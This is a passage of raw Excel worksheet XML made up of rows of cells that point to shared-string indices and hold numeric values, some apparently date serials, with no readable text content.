    <row r="12096" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12096" t="s">
        <v>17374</v>
      </c>
      <c r="B12096">
        <v>13820</v>
      </c>
      <c r="C12096" t="s">
        <v>1345</v>
      </c>
      <c r="D12096" t="s">
        <v>17375</v>
      </c>
      <c r="E12096" t="s">
        <v>17370</v>
      </c>
      <c r="F12096" t="s">
        <v>17370</v>
      </c>
      <c r="I12096" t="s">
        <v>17371</v>
      </c>
    </row>
    <row r="12097" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12097" t="s">
        <v>17374</v>
      </c>
      <c r="B12097">
        <v>13820</v>
      </c>
      <c r="C12097" t="s">
        <v>1348</v>
      </c>
      <c r="D12097" t="s">
        <v>17375</v>
      </c>
      <c r="E12097" t="s">
        <v>17370</v>
      </c>
      <c r="F12097" t="s">
        <v>17370</v>
      </c>
      <c r="I12097" t="s">
        <v>17371</v>
      </c>
    </row>
    <row r="12098" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12098" t="s">
        <v>17376</v>
      </c>
      <c r="B12098">
        <v>13821</v>
      </c>
      <c r="C12098" t="s">
        <v>1345</v>
      </c>
      <c r="D12098" t="s">
        <v>17377</v>
      </c>
      <c r="E12098" t="s">
        <v>17370</v>
      </c>
      <c r="F12098" t="s">
        <v>17370</v>
      </c>
      <c r="I12098" t="s">
        <v>17371</v>
      </c>
    </row>
    <row r="12099" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12099" t="s">
        <v>17376</v>
      </c>
      <c r="B12099">
        <v>13821</v>
      </c>
      <c r="C12099" t="s">
        <v>1348</v>
      </c>
      <c r="D12099" t="s">
        <v>17377</v>
      </c>
      <c r="E12099" t="s">
        <v>17370</v>
      </c>
      <c r="F12099" t="s">
        <v>17370</v>
      </c>
      <c r="I12099" t="s">
        <v>17371</v>
      </c>
    </row>
    <row r="12100" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12100" t="s">
        <v>17378</v>
      </c>
      <c r="B12100">
        <v>13822</v>
      </c>
      <c r="C12100" t="s">
        <v>1345</v>
      </c>
      <c r="D12100" t="s">
        <v>17379</v>
      </c>
      <c r="E12100" t="s">
        <v>17370</v>
      </c>
      <c r="F12100" t="s">
        <v>17370</v>
      </c>
      <c r="I12100" t="s">
        <v>17371</v>
      </c>
    </row>
    <row r="12101" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12101" t="s">
        <v>17378</v>
      </c>
      <c r="B12101">
        <v>13822</v>
      </c>
      <c r="C12101" t="s">
        <v>1348</v>
      </c>
      <c r="D12101" t="s">
        <v>17379</v>
      </c>
      <c r="E12101" t="s">
        <v>17370</v>
      </c>
      <c r="F12101" t="s">
        <v>17370</v>
      </c>
      <c r="I12101" t="s">
        <v>17371</v>
      </c>
    </row>
    <row r="12102" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12102" t="s">
        <v>17380</v>
      </c>
      <c r="B12102">
        <v>13823</v>
      </c>
      <c r="C12102" t="s">
        <v>1345</v>
      </c>
      <c r="D12102" t="s">
        <v>17381</v>
      </c>
      <c r="E12102" t="s">
        <v>17382</v>
      </c>
      <c r="F12102" t="s">
        <v>17382</v>
      </c>
      <c r="G12102">
        <v>40603</v>
      </c>
    </row>
    <row r="12103" spans="1:9" x14ac:dyDescent="0.25">
      <c r="B12103">
        <v>13823</v>
      </c>
      <c r="C12103" t="s">
        <v>1348</v>
      </c>
      <c r="D12103" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12104" spans="1:9" x14ac:dyDescent="0.25">
      <c r="B12104" t="s">
        <v>17383</v>
      </c>
      <c r="D12104" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12105" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12105" t="s">
        <v>17384</v>
      </c>
      <c r="B12105">
        <v>13894</v>
      </c>
      <c r="C12105" t="s">
        <v>1345</v>
      </c>
      <c r="D12105" t="s">
        <v>17385</v>
      </c>
      <c r="E12105" t="s">
        <v>17386</v>
      </c>
      <c r="F12105" t="s">
        <v>17387</v>
      </c>
      <c r="G12105">
        <v>41162</v>
      </c>
    </row>
    <row r="12106" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12106" t="s">
        <v>17384</v>
      </c>
      <c r="B12106">
        <v>13894</v>
      </c>
      <c r="C12106" t="s">
        <v>1348</v>
      </c>
      <c r="D12106" t="s">
        <v>17385</v>
      </c>
      <c r="E12106" t="s">
        <v>17386</v>
      </c>
      <c r="F12106" t="s">
        <v>17387</v>
      </c>
      <c r="G12106">
        <v>41162</v>
      </c>
    </row>
    <row r="12107" spans="1:9" x14ac:dyDescent="0.25">
      <c r="B12107" t="s">
        <v>17388</v>
      </c>
      <c r="D12107" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12108" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12108" t="s">
        <v>17389</v>
      </c>
      <c r="B12108">
        <v>13929</v>
      </c>
      <c r="C12108" t="s">
        <v>1345</v>
      </c>
      <c r="D12108" t="s">
        <v>17390</v>
      </c>
      <c r="E12108" t="s">
        <v>17391</v>
      </c>
      <c r="F12108" t="s">
        <v>17391</v>
      </c>
      <c r="G12108">
        <v>39790</v>
      </c>
    </row>
    <row r="12109" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12109" t="s">
        <v>17389</v>
      </c>
      <c r="B12109">
        <v>13929</v>
      </c>
      <c r="C12109" t="s">
        <v>1348</v>
      </c>
      <c r="D12109" t="s">
        <v>17390</v>
      </c>
      <c r="E12109" t="s">
        <v>17391</v>
      </c>
      <c r="F12109" t="s">
        <v>17391</v>
      </c>
      <c r="G12109">
        <v>39790</v>
      </c>
    </row>
    <row r="12110" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A12110" t="s">
        <v>17392</v>
      </c>
      <c r="B12110">
        <v>13930</v>
      </c>
      <c r="C12110" t="s">
        <v>1345</v>
      </c>
      <c r="D12110" t="s">
        <v>17393</v>
      </c>
      <c r="E12110" t="s">
        <v>17394</v>
      </c>
      <c r="F12110" t="s">
        <v>17394</v>
      </c>
      <c r="G12110">
        <v>39745</v>
      </c>
    </row>
    <row r="12111" spans="1:9" x14ac:dyDescent="0.25">
      <c r="B12111">
        <v>13930</v>
      </c>
      <c r="C12111" t="s">
        <v>1348</v>
      </c>
      <c r="D12111" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12112" spans="1:9" x14ac:dyDescent="0.25">
      <c r="B12112" t="s">
        <v>17395</v>
      </c>
      <c r="D12112" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12113" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12113" t="s">
        <v>17396</v>
      </c>
      <c r="B12113">
        <v>14000</v>
      </c>
      <c r="C12113" t="s">
        <v>1345</v>
      </c>
      <c r="D12113" t="s">
        <v>17397</v>
      </c>
      <c r="E12113" t="s">
        <v>17398</v>
      </c>
      <c r="F12113" t="s">
        <v>17398</v>
      </c>
      <c r="G12113" t="s">
        <v>6244</v>
      </c>
    </row>
    <row r="12114" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12114" t="s">
        <v>17396</v>
      </c>
      <c r="B12114">
        <v>14000</v>
      </c>
      <c r="C12114" t="s">
        <v>1348</v>
      </c>
      <c r="D12114" t="s">
        <v>17397</v>
      </c>
      <c r="E12114" t="s">
        <v>17398</v>
      </c>
      <c r="F12114" t="s">
        <v>17398</v>
      </c>
      <c r="G12114" t="s">
        <v>6244</v>
      </c>
    </row>
    <row r="12115" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12115" t="s">
        <v>17399</v>
      </c>
      <c r="B12115">
        <v>14001</v>
      </c>
      <c r="C12115" t="s">
        <v>1345</v>
      </c>
      <c r="D12115" t="s">
        <v>17400</v>
      </c>
      <c r="E12115" t="s">
        <v>17401</v>
      </c>
      <c r="F12115" t="s">
        <v>17401</v>
      </c>
    </row>
    <row r="12116" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12116" t="s">
        <v>17399</v>
      </c>
      <c r="B12116">
        <v>14001</v>
      </c>
      <c r="C12116" t="s">
        <v>1348</v>
      </c>
      <c r="D12116" t="s">
        <v>17402</v>
      </c>
      <c r="E12116" t="s">
        <v>17401</v>
      </c>
      <c r="F12116" t="s">
        <v>17401</v>
      </c>
      <c r="G12116">
        <v>37048</v>
      </c>
    </row>
    <row r="12117" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12117" t="s">
        <v>17399</v>
      </c>
      <c r="B12117">
        <v>14001</v>
      </c>
      <c r="C12117" t="s">
        <v>1363</v>
      </c>
      <c r="D12117" t="s">
        <v>17400</v>
      </c>
      <c r="E12117" t="s">
        <v>17401</v>
      </c>
      <c r="F12117" t="s">
        <v>17401</v>
      </c>
    </row>
    <row r="12118" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12118" t="s">
        <v>17403</v>
      </c>
      <c r="B12118">
        <v>14002</v>
      </c>
      <c r="C12118" t="s">
        <v>1348</v>
      </c>
      <c r="D12118" t="s">
        <v>17404</v>
      </c>
      <c r="E12118" t="s">
        <v>17405</v>
      </c>
      <c r="F12118" t="s">
        <v>17406</v>
      </c>
      <c r="G12118">
        <v>41288</v>
      </c>
    </row>
    <row r="12119" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12119">
        <v>14002</v>
      </c>
      <c r="C12119" t="s">
        <v>1345</v>
      </c>
      <c r="D12119" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12120" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12120" t="s">
        <v>17407</v>
      </c>
      <c r="D12120" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12121" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12121" t="s">
        <v>17408</v>
      </c>
      <c r="B12121">
        <v>14033</v>
      </c>
      <c r="C12121" t="s">
        <v>1345</v>
      </c>
      <c r="D12121" t="s">
        <v>17409</v>
      </c>
      <c r="E12121" t="s">
        <v>17410</v>
      </c>
      <c r="F12121" t="s">
        <v>17410</v>
      </c>
    </row>
    <row r="12122" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12122" t="s">
        <v>17408</v>
      </c>
      <c r="B12122">
        <v>14033</v>
      </c>
      <c r="C12122" t="s">
        <v>1348</v>
      </c>
      <c r="D12122" t="s">
        <v>17409</v>
      </c>
      <c r="E12122" t="s">
        <v>17410</v>
      </c>
      <c r="F12122" t="s">
        <v>17410</v>
      </c>
    </row>
    <row r="12123" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12123" t="s">
        <v>17411</v>
      </c>
      <c r="B12123">
        <v>14034</v>
      </c>
      <c r="C12123" t="s">
        <v>1345</v>
      </c>
      <c r="D12123" t="s">
        <v>17412</v>
      </c>
      <c r="E12123" t="s">
        <v>17410</v>
      </c>
      <c r="F12123" t="s">
        <v>17410</v>
      </c>
    </row>
    <row r="12124" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12124" t="s">
        <v>17411</v>
      </c>
      <c r="B12124">
        <v>14034</v>
      </c>
      <c r="C12124" t="s">
        <v>1348</v>
      </c>
      <c r="D12124" t="s">
        <v>17412</v>
      </c>
      <c r="E12124" t="s">
        <v>17410</v>
      </c>
      <c r="F12124" t="s">
        <v>17410</v>
      </c>
    </row>
    <row r="12125" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12125" t="s">
        <v>17413</v>
      </c>
      <c r="D12125" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12126" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12126" t="s">
        <v>17414</v>
      </c>
      <c r="B12126">
        <v>14141</v>
      </c>
      <c r="C12126" t="s">
        <v>1345</v>
      </c>
      <c r="D12126" t="s">
        <v>17415</v>
      </c>
      <c r="E12126" t="s">
        <v>11544</v>
      </c>
      <c r="F12126" t="s">
        <v>11544</v>
      </c>
    </row>
    <row r="12127" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12127" t="s">
        <v>17414</v>
      </c>
      <c r="B12127">
        <v>14141</v>
      </c>
      <c r="C12127" t="s">
        <v>1348</v>
      </c>
      <c r="D12127" t="s">
        <v>17415</v>
      </c>
      <c r="E12127" t="s">
        <v>11544</v>
      </c>
      <c r="F12127" t="s">
        <v>11544</v>
      </c>
    </row>
    <row r="12128" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12128" t="s">
        <v>17416</v>
      </c>
      <c r="B12128">
        <v>14142</v>
      </c>
      <c r="C12128" t="s">
        <v>1345</v>
      </c>
      <c r="D12128" t="s">
        <v>17417</v>
      </c>
      <c r="E12128" t="s">
        <v>17418</v>
      </c>
      <c r="F12128" t="s">
        <v>17418</v>
      </c>
      <c r="G12128" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="12129" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12129" t="s">
        <v>17416</v>
      </c>
      <c r="B12129">
        <v>14142</v>
      </c>
      <c r="C12129" t="s">
        <v>1348</v>
      </c>
      <c r="D12129" t="s">
        <v>17417</v>
      </c>
      <c r="E12129" t="s">
        <v>17418</v>
      </c>
      <c r="F12129" t="s">
        <v>17418</v>
      </c>
      <c r="G12129" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="12130" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12130" t="s">
        <v>17419</v>
      </c>
      <c r="B12130">
        <v>14143</v>
      </c>
      <c r="C12130" t="s">
        <v>1345</v>
      </c>
      <c r="D12130" t="s">
        <v>17420</v>
      </c>
      <c r="E12130" t="s">
        <v>17421</v>
      </c>
      <c r="F12130" t="s">
        <v>17421</v>
      </c>
      <c r="G12130">
        <v>42514</v>
      </c>
    </row>
    <row r="12131" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12131">
        <v>14143</v>
      </c>
      <c r="C12131" t="s">
        <v>1348</v>
      </c>
      <c r="D12131" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12132" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12132">
        <v>14144</v>
      </c>
      <c r="D12132" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12133" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12133" t="s">
        <v>17422</v>
      </c>
      <c r="B12133">
        <v>14145</v>
      </c>
      <c r="C12133" t="s">
        <v>1345</v>
      </c>
      <c r="D12133" t="s">
        <v>17423</v>
      </c>
      <c r="E12133" t="s">
        <v>11544</v>
      </c>
      <c r="F12133" t="s">
        <v>11544</v>
      </c>
    </row>
    <row r="12134" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12134" t="s">
        <v>17422</v>
      </c>
      <c r="B12134">
        <v>14145</v>
      </c>
      <c r="C12134" t="s">
        <v>1348</v>
      </c>
      <c r="D12134" t="s">
        <v>17423</v>
      </c>
      <c r="E12134" t="s">
        <v>11544</v>
      </c>
      <c r="F12134" t="s">
        <v>11544</v>
      </c>
    </row>
    <row r="12135" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12135" t="s">
        <v>17424</v>
      </c>
      <c r="D12135" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12136" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12136" t="s">
        <v>17425</v>
      </c>
      <c r="B12136">
        <v>14149</v>
      </c>
      <c r="C12136" t="s">
        <v>1345</v>
      </c>
      <c r="D12136" t="s">
        <v>17426</v>
      </c>
      <c r="E12136" t="s">
        <v>17427</v>
      </c>
      <c r="F12136" t="s">
        <v>17427</v>
      </c>
      <c r="G12136" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="12137" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12137" t="s">
        <v>17425</v>
      </c>
      <c r="B12137">
        <v>14149</v>
      </c>
      <c r="C12137" t="s">
        <v>1348</v>
      </c>
      <c r="D12137" t="s">
        <v>17426</v>
      </c>
      <c r="E12137" t="s">
        <v>17427</v>
      </c>
      <c r="F12137" t="s">
        <v>17427</v>
      </c>
      <c r="G12137" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="12138" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12138" t="s">
        <v>17428</v>
      </c>
      <c r="B12138">
        <v>14150</v>
      </c>
      <c r="C12138" t="s">
        <v>1345</v>
      </c>
      <c r="D12138" t="s">
        <v>17429</v>
      </c>
      <c r="E12138" t="s">
        <v>17430</v>
      </c>
      <c r="F12138" t="s">
        <v>17430</v>
      </c>
      <c r="G12138">
        <v>39723</v>
      </c>
    </row>
    <row r="12139" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12139">
        <v>14150</v>
      </c>
      <c r="C12139" t="s">
        <v>1348</v>
      </c>
      <c r="D12139" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12140" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12140" t="s">
        <v>17431</v>
      </c>
      <c r="D12140" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12141" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12141" t="s">
        <v>17432</v>
      </c>
      <c r="B12141">
        <v>14154</v>
      </c>
      <c r="C12141" t="s">
        <v>1345</v>
      </c>
      <c r="D12141" t="s">
        <v>17433</v>
      </c>
      <c r="E12141" t="s">
        <v>17434</v>
      </c>
      <c r="F12141" t="s">
        <v>17434</v>
      </c>
      <c r="G12141" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12142" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12142" t="s">
        <v>17432</v>
      </c>
      <c r="B12142">
        <v>14154</v>
      </c>
      <c r="C12142" t="s">
        <v>1348</v>
      </c>
      <c r="D12142" t="s">
        <v>17433</v>
      </c>
      <c r="E12142" t="s">
        <v>17434</v>
      </c>
      <c r="F12142" t="s">
        <v>17434</v>
      </c>
      <c r="G12142" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="12143" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12143" t="s">
        <v>17435</v>
      </c>
      <c r="D12143" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12144" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12144" t="s">
        <v>17436</v>
      </c>
      <c r="B12144">
        <v>14250</v>
      </c>
      <c r="C12144" t="s">
        <v>1345</v>
      </c>
      <c r="D12144" t="s">
        <v>17437</v>
      </c>
      <c r="E12144" t="s">
        <v>17438</v>
      </c>
      <c r="F12144" t="s">
        <v>17438</v>
      </c>
      <c r="G12144">
        <v>39541</v>
      </c>
    </row>
    <row r="12145" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12145" t="s">
        <v>17436</v>
      </c>
      <c r="B12145">
        <v>14250</v>
      </c>
      <c r="C12145" t="s">
        <v>1348</v>
      </c>
      <c r="D12145" t="s">
        <v>17437</v>
      </c>
      <c r="E12145" t="s">
        <v>17438</v>
      </c>
      <c r="F12145" t="s">
        <v>17438</v>
      </c>
      <c r="G12145">
        <v>39541</v>
      </c>
    </row>
    <row r="12146" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12146" t="s">
        <v>17439</v>
      </c>
      <c r="D12146" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12147" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12147" t="s">
        <v>17440</v>
      </c>
      <c r="B12147">
        <v>14414</v>
      </c>
      <c r="C12147" t="s">
        <v>1345</v>
      </c>
      <c r="D12147" t="s">
        <v>17441</v>
      </c>
      <c r="E12147" t="s">
        <v>17442</v>
      </c>
      <c r="F12147" t="s">
        <v>17442</v>
      </c>
      <c r="G12147" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="12148" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12148" t="s">
        <v>17440</v>
      </c>
      <c r="B12148">
        <v>14414</v>
      </c>
      <c r="C12148" t="s">
        <v>1348</v>
      </c>
      <c r="D12148" t="s">
        <v>17441</v>
      </c>
      <c r="E12148" t="s">
        <v>17442</v>
      </c>
      <c r="F12148" t="s">
        <v>17442</v>
      </c>
      <c r="G12148" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="12149" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12149" t="s">
        <v>17443</v>
      </c>
      <c r="D12149" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12150" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12150" t="s">
        <v>17444</v>
      </c>
      <c r="B12150">
        <v>14500</v>
      </c>
      <c r="C12150" t="s">
        <v>1345</v>
      </c>
      <c r="D12150" t="s">
        <v>17445</v>
      </c>
      <c r="E12150" t="s">
        <v>17446</v>
      </c>
      <c r="F12150" t="s">
        <v>17447</v>
      </c>
      <c r="G12150">
        <v>42648</v>
      </c>
    </row>
    <row r="12151" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12151">
        <v>14500</v>
      </c>
      <c r="C12151" t="s">
        <v>1348</v>
      </c>
      <c r="D12151" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12152" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12152" t="s">
        <v>17448</v>
      </c>
      <c r="D12152" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12153" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12153" t="s">
        <v>17449</v>
      </c>
      <c r="B12153">
        <v>14936</v>
      </c>
      <c r="C12153" t="s">
        <v>1345</v>
      </c>
      <c r="D12153" t="s">
        <v>17449</v>
      </c>
      <c r="E12153" t="s">
        <v>17450</v>
      </c>
      <c r="F12153" t="s">
        <v>17450</v>
      </c>
    </row>
    <row r="12154" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12154" t="s">
        <v>17449</v>
      </c>
      <c r="B12154">
        <v>14936</v>
      </c>
      <c r="C12154" t="s">
        <v>1348</v>
      </c>
      <c r="D12154" t="s">
        <v>17449</v>
      </c>
      <c r="E12154" t="s">
        <v>17450</v>
      </c>
      <c r="F12154" t="s">
        <v>17450</v>
      </c>
    </row>
    <row r="12155" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12155" t="s">
        <v>17451</v>
      </c>
      <c r="B12155">
        <v>14937</v>
      </c>
      <c r="C12155" t="s">
        <v>1345</v>
      </c>
      <c r="D12155" t="s">
        <v>17451</v>
      </c>
      <c r="E12155" t="s">
        <v>17450</v>
      </c>
      <c r="F12155" t="s">
        <v>17450</v>
      </c>
    </row>
    <row r="12156" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12156" t="s">
        <v>17451</v>
      </c>
      <c r="B12156">
        <v>14937</v>
      </c>
      <c r="C12156" t="s">
        <v>1348</v>
      </c>
      <c r="D12156" t="s">
        <v>17451</v>
      </c>
      <c r="E12156" t="s">
        <v>17450</v>
      </c>
      <c r="F12156" t="s">
        <v>17450</v>
      </c>
    </row>
    <row r="12157" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12157" t="s">
        <v>17452</v>
      </c>
      <c r="D12157" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12158" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12158" t="s">
        <v>17453</v>
      </c>
      <c r="B12158">
        <v>15000</v>
      </c>
      <c r="C12158" t="s">
        <v>1345</v>
      </c>
      <c r="D12158" t="s">
        <v>17454</v>
      </c>
      <c r="E12158" t="s">
        <v>17455</v>
      </c>
      <c r="F12158" t="s">
        <v>17456</v>
      </c>
      <c r="H12158">
        <v>40843</v>
      </c>
    </row>
    <row r="12159" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12159" t="s">
        <v>17453</v>
      </c>
      <c r="B12159">
        <v>15000</v>
      </c>
      <c r="C12159" t="s">
        <v>1348</v>
      </c>
      <c r="D12159" t="s">
        <v>17454</v>
      </c>
      <c r="E12159" t="s">
        <v>17455</v>
      </c>
      <c r="F12159" t="s">
        <v>17456</v>
      </c>
      <c r="H12159">
        <v>40843</v>
      </c>
    </row>
    <row r="12160" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12160">
        <v>15001</v>
      </c>
      <c r="D12160" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12161" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12161" t="s">
        <v>17457</v>
      </c>
      <c r="B12161">
        <v>15002</v>
      </c>
      <c r="C12161" t="s">
        <v>1345</v>
      </c>
      <c r="D12161" t="s">
        <v>17458</v>
      </c>
      <c r="E12161" t="s">
        <v>17459</v>
      </c>
      <c r="F12161" t="s">
        <v>17460</v>
      </c>
      <c r="G12161">
        <v>41660</v>
      </c>
    </row>
    <row r="12162" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12162">
        <v>15002</v>
      </c>
      <c r="C12162" t="s">
        <v>1348</v>
      </c>
      <c r="D12162" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12163" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12163" t="s">
        <v>17461</v>
      </c>
      <c r="D12163" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12164" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12164">
        <v>15118</v>
      </c>
      <c r="C12164" t="s">
        <v>1345</v>
      </c>
      <c r="D12164" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12165" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12165" t="s">
        <v>17462</v>
      </c>
      <c r="B12165">
        <v>15118</v>
      </c>
      <c r="C12165" t="s">
        <v>1348</v>
      </c>
      <c r="D12165" t="s">
        <v>17463</v>
      </c>
      <c r="E12165" t="s">
        <v>17464</v>
      </c>
      <c r="F12165" t="s">
        <v>17464</v>
      </c>
      <c r="G12165">
        <v>40639</v>
      </c>
    </row>
    <row r="12166" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12166" t="s">
        <v>17465</v>
      </c>
      <c r="D12166" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12167" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12167" t="s">
        <v>17466</v>
      </c>
      <c r="B12167">
        <v>15345</v>
      </c>
      <c r="C12167" t="s">
        <v>1345</v>
      </c>
      <c r="D12167" t="s">
        <v>17467</v>
      </c>
      <c r="E12167" t="s">
        <v>17468</v>
      </c>
      <c r="F12167" t="s">
        <v>17468</v>
      </c>
    </row>
    <row r="12168" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12168" t="s">
        <v>17466</v>
      </c>
      <c r="B12168">
        <v>15345</v>
      </c>
      <c r="C12168" t="s">
        <v>1348</v>
      </c>
      <c r="D12168" t="s">
        <v>17467</v>
      </c>
      <c r="E12168" t="s">
        <v>17468</v>
      </c>
      <c r="F12168" t="s">
        <v>17468</v>
      </c>
    </row>
    <row r="12169" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12169" t="s">
        <v>17469</v>
      </c>
      <c r="D12169" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12170" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12170" t="s">
        <v>17470</v>
      </c>
      <c r="B12170">
        <v>15363</v>
      </c>
      <c r="C12170" t="s">
        <v>1345</v>
      </c>
      <c r="D12170" t="s">
        <v>17471</v>
      </c>
      <c r="E12170" t="s">
        <v>17472</v>
      </c>
      <c r="F12170" t="s">
        <v>17472</v>
      </c>
      <c r="G12170" t="s">
        <v>6200</v>
      </c>
    </row>
    <row r="12171" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12171" t="s">
        <v>17470</v>
      </c>
      <c r="B12171">
        <v>15363</v>
      </c>
      <c r="C12171" t="s">
        <v>1348</v>
      </c>
      <c r="D12171" t="s">
        <v>17471</v>
      </c>
      <c r="E12171" t="s">
        <v>17472</v>
      </c>
      <c r="F12171" t="s">
        <v>17472</v>
      </c>
      <c r="G12171" t="s">
        <v>6200</v>
      </c>
    </row>
    <row r="12172" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12172" t="s">
        <v>17473</v>
      </c>
      <c r="D12172" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12173" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12173" t="s">
        <v>17474</v>
      </c>
      <c r="B12173">
        <v>15555</v>
      </c>
      <c r="C12173" t="s">
        <v>1345</v>
      </c>
      <c r="D12173" t="s">
        <v>17475</v>
      </c>
      <c r="E12173" t="s">
        <v>17476</v>
      </c>
      <c r="F12173" t="s">
        <v>17476</v>
      </c>
      <c r="G12173" t="s">
        <v>3545</v>
      </c>
    </row>
    <row r="12174" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12174" t="s">
        <v>17474</v>
      </c>
      <c r="B12174">
        <v>15555</v>
      </c>
      <c r="C12174" t="s">
        <v>1348</v>
      </c>
      <c r="D12174" t="s">
        <v>17475</v>
      </c>
      <c r="E12174" t="s">
        <v>17476</v>
      </c>
      <c r="F12174" t="s">
        <v>17476</v>
      </c>
      <c r="G12174" t="s">
        <v>3545</v>
      </c>
    </row>
    <row r="12175" spans="1:8" x14ac:dyDescent="0.25">
      <c r="B12175" t="s">
        <v>17477</v>
      </c>
      <c r="D12175" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12176" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12176" t="s">
        <v>17478</v>
      </c>
      <c r="B12176">
        <v>15660</v>
      </c>
      <c r="C12176" t="s">
        <v>1345</v>
      </c>
      <c r="D12176" t="s">
        <v>17479</v>
      </c>
      <c r="E12176" t="s">
        <v>14162</v>
      </c>
      <c r="F12176" t="s">
        <v>14163</v>
      </c>
      <c r="G12176">
        <v>39526</v>
      </c>
      <c r="H12176">
        <v>42039</v>
      </c>
    </row>
    <row r="12177" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12177" t="s">
        <v>17478</v>
      </c>
      <c r="B12177">
        <v>15660</v>
      </c>
